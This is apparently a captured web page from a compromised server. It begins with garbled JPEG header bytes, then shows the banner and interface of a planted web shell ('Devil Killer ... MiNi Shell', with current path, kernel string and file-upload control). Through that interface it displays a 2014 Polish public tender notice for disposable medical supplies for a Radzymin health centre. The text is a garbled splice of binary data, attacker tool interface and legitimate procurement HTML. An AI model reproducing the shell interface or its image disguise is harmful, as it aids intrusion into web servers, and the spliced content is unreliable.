JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140729/253430-N-2014.html

<p class="kh_header"><b>Radzymin: Zakup i dostawa materiałów medycznych i sprzętu jednorazowego użytku dla Centrum Medycznego im. Bitwy Warszawskiej 1920r. w Radzyminie na 2014r./2015r.</b><br>
<b>Numer ogłoszenia: 253430 - 2014; data zamieszczenia: 29.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Medyczne im. Bitwy Warszawskiej 1920 r.w Radzyminie Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 22 7865037, faks 22 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz-radzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów medycznych i sprzętu jednorazowego użytku dla Centrum Medycznego im. Bitwy Warszawskiej 1920r. w Radzyminie na 2014r./2015r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 1 dotyczy Materiały medyczne i sprzęt jednorazowego użytku 
1	Przedłużacz do pompy Infuł. KZ-11 jałowy, niepiroge. nietoksycz. średnica wew. 1,24cm długość 1500mm	200 szt
2	Worki do moczu 2000 ml  sterylne.	1000 szt
3	Szpatułki drewniane 1 op. 100szt.	180 op
4	Veuflon 20G x 11/4 różowy 1,1 x 32 mm	2 500 szt
5	 Veuflon 22 G x 1 niebieski 0,9 x 25 mm	2 500 szt
6	Venflon  18 G x ?  zielony 1,3 x 45 mm	500 szt
7	Veuflon  16 G szary  1,7 x 45 mm	50 szt
8	Velflon 26 G x 3/4  fioletowy  0,62 x 19 mm	500 szt
9	Velflon bezpieczny 20G x 1 ?  różowy 1,1 x 32 mm	1000 szt
10	Velflon bezpieczny 26G x 3/4  fioletowy 0,6,19 mm	500 szt
11	Lancety bezpieczne  igła znajduje się w plastykowej obudowie nakłucie aktywowane przez dociśniecie nakłuwacza do opuszki palca rozmiar 2,4 mm   	5 000 szt
12	Lancety bezpieczne  igła znajduje się w plastykowej obudowie nakłucie aktywowane przez dociśniecie nakłuwacza do opuszki palca rozmiar 1,8 mm 	5 000 szt
13	Ostrze chirurgiczne  Nr 11    100 szt. w op.	30 op
14	Ostrze chirurgiczne Nr 15	15 op
15	Prześcieradła papierowe   rolk  szer. 50 cm. długość 80 m.	1000  szt
16	Pojemnik na zużyte igły 1 L	1500  szt
17	Pojemnik na zużyte igły 0,7 L	300 szt
18	Pojemnik na zużyte igły 0,2 L	200 szt
19	Szkiełka do cyt. z  jednej strony wymatowione  50 szt w op.	30 op
20	Ustniki  do spir. MicroLab  jednorazowe papierowe  60 mm x 28 mm x 30 mm	400 szt
21	Wymienna głowica pneumotachograficzna bez filtra antybakteryjnego do Spirometru LUNGTEST Mobile	10 szt
22	Ustniki  do spir. jednorazowe papierowe  60 mm x 28 mm x 30 mm	400 szt
23	Ustniki  do spir. jednorazowe papierowe  60 mm x 29 mm x 31 mm Spirometr LUNGTEST Mobile	400 szt
24	Osłonki na głowicę USG  1 op. 144 szt.	10 op
25	Utrwalacz do szkieł cytologicznych w aerozolu	30 szt.
26	Wziernik XXS 	600 szt.
27	Wziernik ginekologiczny Nr L 	600 szt.
28	Wziernik ginekologiczny Nr XS	800 szt.
29	Wziernik ginekologiczny Nr S	1000 szt
30	Wziernik ginekologiczny Nr M	1000 szt
31	Podkład podfoliowany 40 x 50 po 80 szt w rolce 	60 rolek
32	Kieliszki do podawania leków   op. 75 szt 	250 op.
33	Opaski na zwłoki 	200 szt.
34	Opaski identyfikacyjne dla pacjentów	800 szt
35	Staza automatyczna	30 szt
36	Bicakcilar korek do kaniuli, dwufunkcyjny typu kombi, uniwersalny umożliwiający jednoczesne zabezpieczenie kaniuli i strzykawki, trzpień koreczka poniżej krawędzi korka.	400 szt.
37	Kranik trójprzewodowy	300 szt
38	Koreczki do7velflonów białe	600 szt
39	Maski higieniczne na gumki, osłonki na twarz  50 szt. w op.	1200 szt.
40	Basen plastikowy	10 szt.
41	Kaczka plastikowa	10 szt.
42	Miski nerkowe plastikowe	10 szt.
43	Rurka ustno-gardłowa jednorazowego użytku rozmiar  80 mm	20szt.
44	Rurka ustno-gardłowa jednorazowego użytku rozmiar  90 mm	20 szt.
45	Rurka ustno-gardłowa jednorazowego użytku rozmiar 70 mm	5 szt
46	Rurka ustno-gardłowa jednorazowego użytku rozmiar 30 mm	5 szt
47	Rurka ustno-gardłowa jednorazowego użytku rozmiar 50 mm 	5 szt
48	Rurka ustno-gardłowa jednorazowego użytku rozmiar 60 mm 	5 szt
49	Rurka ustno-gardłowa jednorazowego użytku rozmiar 40 mm	5 szt
49	Rurki intubacyjne z mankietem niskociśnieniowym  8,5   z medycznego CPV	10 szt.
50	Rurki intubacyjne z mankietem niskociśnieniowym  8   z medycznego CPV	10 szt
51	Rurki intubacyjne z mankietem niskociśnieniowym  7,5  z medycznego CPV	10 szt
52	Rurki intubacyjne z mankietem niskociśnieniowym   7    z medycznego CPV	10 szt
53	Rurki intubacyjne z mankietem niskociśnieniowym 6,5  z medycznego CPV	10 szt
54	Rurki intubacyjne z mankietem niskociśnieniowym 6   z medycznego CPV	10 szt
55	Rurki intubacyjne z mankietem niskociśnieniowym  5,5 z medycznego CPV	10 szt
56	Rurki intubacyjne z mankietem niskociśnieniowym  5  z medycznego CPV	10 szt
57	Rurki intubacyjne z mankietem niskociśnieniowym  4,5  z medycznego CPV	10 szt
58	Rurki intubacyjne z mankietem niskociśnieniowym  4    z medycznego CPV	10 szt
59	Bezigłowy port do iniekcji,  objętość wypełnienia 0,09 ml	500 szt

Przedmiot zamówienia w zakresie zadania nr 2 dotyczy Szczoteczki cytologiczne
1	Szczoteczki cytologiczne jednorazowego użytku typu  CytoBrush  2000 szt.

Przedmiot zamówienia w zakresie zadania nr 3 dotyczy Materiały i sprzęt jednorazowego użytku strzykawki  
1	Strzykawka Luer 20 ml. skala co 1 ml rozszerzona do 24 ml plastik  w 1 op. 100 szt.	120 op.
2	Strzykawka Luer 5 ml. skala 0,2 ml rozszerzona do 6,0 ml Plastik  w 1 op. 100 szt.	140 op.
3	Strzykawka Luer 10 ml. skala co 0,5 ml rozszerzona do 12 ml Plastyki   w 1 op. 100 szt.	100 op.
4	Strzykawka Luer 2 ml. skala co 0,1 ml rozszerzona do 3,0 ml Plastyki  w 1 op. 100 szt. 	160 op.
5	Strzykawki do pompy  infuzyjnej 20 ml.	200 szt
6	Strzykawka do pompy infuzyjnej 50/60  ml 	100 szt.
7	Aparat typu Mini - spike do przygotowywania i pobierania leków z filtrem  bakteryjnym                       0,45?m	500 szt
8	Żel do USG 500g	 400  szt
9	Żel do EKG  500g	30 szt
10	Żel do holtera ścieralny	15 op.
11	Przedłużacz do tlenu  16 x 3000 mm	200szt
12	Maski do podawania tlenu	200 szt
13	Dren do maski tlenowej dł. 2,10 m	200 szt
14	Strzykawka 100 ml z końcówką do cewników  Luer	 200 szt.
15	Strzykawka 1 ml insulinowa z oddzielną igłą z podziałką 0,1 ml	100szt.
16	Strzykawka 20 ml do leków światłoczułych	100 szt
17	Strzykawka 50 ml do leków światłoczułych	150 szt
.
Przedmiot zamówienia w zakresie zadania nr 4 dotyczy Sprzęt jednorazowego użytku cewniki  
1	Cewnik Foley dwudrożny silikonowane.Nr16	100 szt
2	Cewnik Foley dwudrożny silikonowane.Nr18	200 szt
3	Cewnik Foley dwudrożny silikonowane. Nr20	80 szt
4	Cewnik Foley dwudrożny silikonowane.Nr22	80 szt
5	Cewnik Foley dwudrożny silikonowane. Nr24	30 szt
6	Cewnik Foley dwudrożny silikonowane. Nr14	30 szt.
7	Cewnik do odsysania Nr 14	30 szt
8	Cewnik do odsysania Nr 16	30 szt
9	Cewnik do odsysania Nr 18	30szt
10	Cewnik do odsysania Nr 20	30 szt
11	Cewnik do odsysania Nr 22	30 szt
12	Cewnik do podawania tlenu przez nos 180 cm.	500 szt
13	Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 25mm	20 szt
14	Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 29 mm	20 szt.
15	Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 32 mm	20 szt.
16	Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny  36 mm	20 szt.
17	Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 41 mm	20 szt
18	Zgłębnik żołądkowy Nr 24	30 szt
19	Zgłębnik żołądkowy Nr 22	30 szt.
20	Zgłębnik żołądkowy Nr 20	30 szt.
21	Zgłębnik żołądkowy Nr 18	30 szt.
22	Igła do aspiracji tępa z filtrem 18G  Rozmiar 1,3 x 40  100 szt w op.	100 op.

Przedmiot zamówienia w zakresie zadania nr 5 dotyczy Sprzęt jednorazowego użytku igły 
1	Igła luer 0,60 x 25    23G x 1                     100 szt. w op.	 50 op
2	Igła luer 0,50x25  25Gx 1                          100 szt. w op.    300 op
3	Igła luer 0,70 x 40 22G x 1 1/2                 100 szt. w op.     100 op
4	Igła luer 0,80 x 40 21G x 1 1/2                 100 szt. w op.	250 op
5	Igła luer 0,90 x 40 20G x 1 1/2                 100 szt. w op.	150 op
6	Igła luer 1,2 x 40 18G x 1 1/2                   100 szt. w op.	350 op
7	Igły PENOFINE   0,33x12,7  29G  100 szt. w op.	10 op
8	Igła 0,3 x 13  30G x 1/2 po 100 szt w op.	20 op
9	Igła 0,4 x 19  27G x 3/4  po 100 szt w op.	10 op.
10	Igła stomatologiczna   0,4 x 4 cm 	300 szt
11	Igła stomatologiczna    0,4 x 6 cm 	300 szt
12	Igła typu motylek 21G 0,8	50 szt
 .

Przedmiot zamówienia w zakresie zadania nr 6 dotyczy Sprzęt jednorazowego użytku rękawice 
1	Rękawice latex bezkalkowe  rozmiar S      po 100 szt op.	500 op
2	Rękawice latex bezkalkowe rozmiar L po 100 szt op.	150 op
3	Rękawice latex bezkalkowe rozmiar M po 100 szt op.	800 op
6	Rękawice chirurg. steryl. 7,5  nie pudrowane  	1200 szt
7	Rękawice chirurg. steryl. 8,5     nie pudrowane	100szt
8	Rękawice chirurgicz. ster. Nr 7  nie pudrowane	600 szt.
9	Rękawice chirurgicz. ster. Nr 6 nie pudrowane	 500 szt.
10	Rękawice nitrylowe S   b/pudrowane     po 100 szt w op	500 szt
11	Rękawice nitrylowe M   b/pudrowane     po 100 szt w op	700 op
12	Rękawice sterylne 6,5 mm bez pudrowe  po 100 szt w op	500 szt
13	Rękawice sterylne 8,0 mm  bez pudrowe  po 100 szt w op	100 szt.
15	Rękawice nitrylowe L   b/pudrowanepo 100 szt w op	150 szt.

Przedmiot zamówienia w zakresie zadania nr 7 dotyczy Materiały opatrunkowe
1	Opaska dziana 4 x 10	3 000  szt
2	Opaska dziana 4 x 15	3 000 szt
3	Opaska dziana 4 x 5	2 000 szt
4	. Opaska elastyczna 4 x 10	200 szt
5	Opaska elastyczna  4 x 15	300 3zt
7	Gaza sterylna 1 x 1 m2	300 szt
8	Gaza opatrunkowa  sterylna 1 x 1/2 m2	200 szt
9	Wata bawełniana 200 g	20 op.
10	Lignina płaty w jednym op.  5 kg	60 op.
11	Plaster z opatrunkiem   1 m x 6 cm    do cięcia	200 op
12	Opaski gipsowe    3x 120  mm   1 op. 12 szt.	30 szt
13	Plaster   10 cm  b/ opatrunk.10 mb. op.	50 op
14	Plaster  15 cm  b/ opatrunk10 mb. op.	30 op
15	Przylepiec b/ opatrunk  hypoalergiczny włókninowy 5x2,5 	1200 szt
16	Przylepiec b/ opatrunk     hypoalergiczny tkaninowy biały                 5 x 2,5 	360  szt.
17	Przecinak do tabletek	10 szt
18	Kompres bawełniany nie jałowy 7,5 x7,5 cm    100 szt. w op.	1 000 op.
19	Kompres bawełniany nie jałowy  10 x 10 cm 100 szt. w po.	1 200 op.
20	Kompres bawełniany nie jałowy 5x5 cm 100 szt. w op.	3000 op.
21	Codofix  Nr 4  siatka zabezpieczająca dł. 7 m.	 100 op.
22	Rękaw do sterylizacji                 5 cm x 200 m op.	20 op.
23	Serweta operacyjna jałowa z otworem  50 cm x 75 cm  6 x 8	100 szt
25	Codofix Nr 14  siatka zabezpieczająca dł. 7 m.	5 op.
26	Codofix nr 10  siatka zabezpieczająca dł. 7 m.	5 op.
27	Codofix nr 8  siatka zabezpieczająca dł. 7 m.	5 op.
28	Codofix nr 6  siatka zabezpieczająca dł. 7 m.	5 op.
29	Chusty chirurgiczne jałowe 45/45 cm.  serwety chirurgiczne wykonane z gazy	400 szt.
30	Samoprzylepny plaster do mocowania kaniuli 8x6 cm przeźroczysty po 50 szt w op	120 op
31	Uchwyty do worków na mocz	200 szt
32	Paski fluoresceinowe do diagnostyki zaburzeń filmu łzowego 1 op. 100 szt	5 op.
33	Opatrunek diagnostyczny, jałowy 56 mm x 70 mm  w 1 op. 25 szt.	2 op. 
34	Aparaty do pompy objętościowej	100 szt
35	Przedłużacz do pompy infuzyjnej ciemny, do leków światłoczułych dł. 150 cm	150 szt
36	Myjki jednorazowe 	500 szt
37	Prześcieradło na łóżko  jednorazowego użytku  fizelinowe	150 szt
38	Poszewka na poduszkę  jednorazowego użytku  fizelinowa	150 szt
39	Poszwa na kołdrę jednorazowego użytku  fizelinowa	150 szt
40	Pokrowiec na materac 	150 szt 
41	Spódnice fizelinowe 	150 szt
42	Kapcie fizelinowe	150 szt
43	Lignina w zwojach	1000 szt.

Przedmiot zamówienia w zakresie zadania nr 8 dotyczy Przyrządy do infuzji   
1	Przyrząd do przetaczania
płynów infuzyjnych typ IS, z długą, elastyczną komorą kroplową, o długości min. 60 mm, część przezroczysta, nie zawierający ftalanów, igła boczna ścięta dwupłaszczyznowo, wyposażona w szczelny, zamykany napowietrznik, filtr płynu o średnicy oczek 15 um, dren o długości 150 cm, posiada precyzyjny regulator przepływu z zaczepem do mocowania końcówki drenu na tylnej powierzchni podczas przepływu w infuzji oraz dodatkowym miejscem do umieszczania igły bocznej po użyciu, sterylizowany EO, opakowanie przyrządu blister - pack. Logo producenta trwale umieszczone na przyrządzie. Brak ftalanów potwierdzony informacją na opakowaniu jednostkowym oraz w dołączonej do oferty karcie charakterystyki produktu chemicznego, wystawionej przez producenta produktu chemicznego, z którego zostały wykonane przyrządy200 szt w op  70 op.  po 200 szt w op
2	Przyrząd do przetaczania
krwi typ TS z duża komorą kroplową o długości 90 mm, 20 kropli = 1 ml +- 0,1,ml, wykonany z tworzywa nie zawierającego ftalanów zaopatrzony w zamykany, antybakteryjny filtr powietrza, wtopiony w komorę kroplową filtr krwi o wielkości oczek 200um, dren długości 150 cm posiadający precyzyjny regulator przepływu z zaczepem do mocowania końcówki drenu na tylnej powierzchni oraz dodatkowym otworem do umieszczania kolca igły biorczej po użyciu, sterylizowany EO, opakowanie przyrządu blister - pack. Logo producenta trwale umieszczone na przyrządzie. Brak ftalanów potwierdzony informacją na opakowaniu jednostkowym oraz w dołączonej do oferty karcie charakterystyki produktu chemicznego, wystawionej przez producenta produktu chemicznego, z którego zostały wykonane przyrządy 300 szt .
.

Przedmiot zamówienia w zakresie zadania nr 9 dotyczy Elektrody do EKG 
1	Elektrody do EKG  50 szt. w op. jednorazowe Sorimex po 50 szt w op	200 op   .

Przedmiot zamówienia w zakresie zadania nr 10 dotyczy Sprzęt jednorazowego użytku   
1	Fartuchy fizelinowe 	1000 szt..

Przedmiot zamówienia w zakresie zadania nr 11 dotyczy Materiały opatrunkowe  
1	Steri-strip - paski do zamykania ran   szwy zewnętrzne   6 mm x 38 mm  100 szt.
2	Steri-strip - paski do zamykania ran   szwy zewnętrzne  3mm x 75 mm    100 szt.
3	Steri-strip - paski do zamykania ran  szwy zewnętrzne    6 mm x 100mm	100 szt
4	Steri-strip - paski do zamykania ran szwy zewnętrzne    6 mm x 75 mm	100 szt
5	Szyna na palec S  rozmiar 230 x 20 mm	30 szt
6	Szyna na palec M rozmiar 400 x 20 mm 	30 szt
7	Szyna na palec L rozmiar 500 x 25 mm  	30 szt
8	Aerochamber      niemowleta	1 szt
9	Aerochamber   dzieci	1 szt.
10	Komplety do inhalatora z maską dziecięcą 	30 op
11	Pojemnik na kał n/jałowy 	2000 szt
12	Pojemnik na mocz 	200 szt
13	Pończochy p/żylakowe  małe  długie AG 400 SL	20 szt
14	Pończochy p/żylakowe  małe krótkie AG 400 SS 	40 szt
15	Pończochy p/żylakowe średnie  krótkie AG 400 MS	50  szt
16	Pończochy p/żylakowe duże  krótkie AG  400 BS	20  szt 
17	Torebka do sterylizacji      130 x 254  100 szt w op.	150 op
18	Torebka do sterylizacji      200 x 330  100 szt w op.	80 op
19	Torebka do sterylizacji      90x 230  100 szt w op.	150 op
20	Wskaźnik wieloparametrowy do sterylizacji 500 szt w op.	10 op
21	Wymiennik ciepła i wilgoci do rurki intubacyjnej	10  szt
22	Pojemnik do ssaka (wymienny firma MEVACS jednorazowy   2000 ml 	10 szt
23	Filrt do  ambu     Bakteryjno -wirusowy HME	20 szt

Przedmiot zamówienia będzie posiadał co najmniej 12 miesięcznym terminem ważności -  licząc od momentu ich dostarczenia do siedziby Kupującego, posiadające dokumenty dopuszczające do obrotu i używania zgodnie z Ustawą z 20 maja 2010r. o wyrobach medycznych, Dz. U. z 2010r  Nr 107, poz. 679 z dn. 17.06.2010r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.00.00-3, 33.14.13.10-6, 33.14.12.00-2, 33.14.13.20-9, 33.14.14.20-0, 33.14.11.00-1, 33.19.41.00-7, 31.71.11.40-6, 33.14.00.00-3, 33.14.11.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunku udziału w postępowaniu o zamówienie publiczne, określone w art. 22 ust. 1 - 4 ustawy Pzp. wg. wzoru załącznika nr 3 do SIWZ (oryginał) potwierdzone : zezwolenie zgodne z obowiązującymi przepisami. Brak obowiązku posiadania zezwolenia Wykonawca potwierdzi własnym oświadczeniem załączonym do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

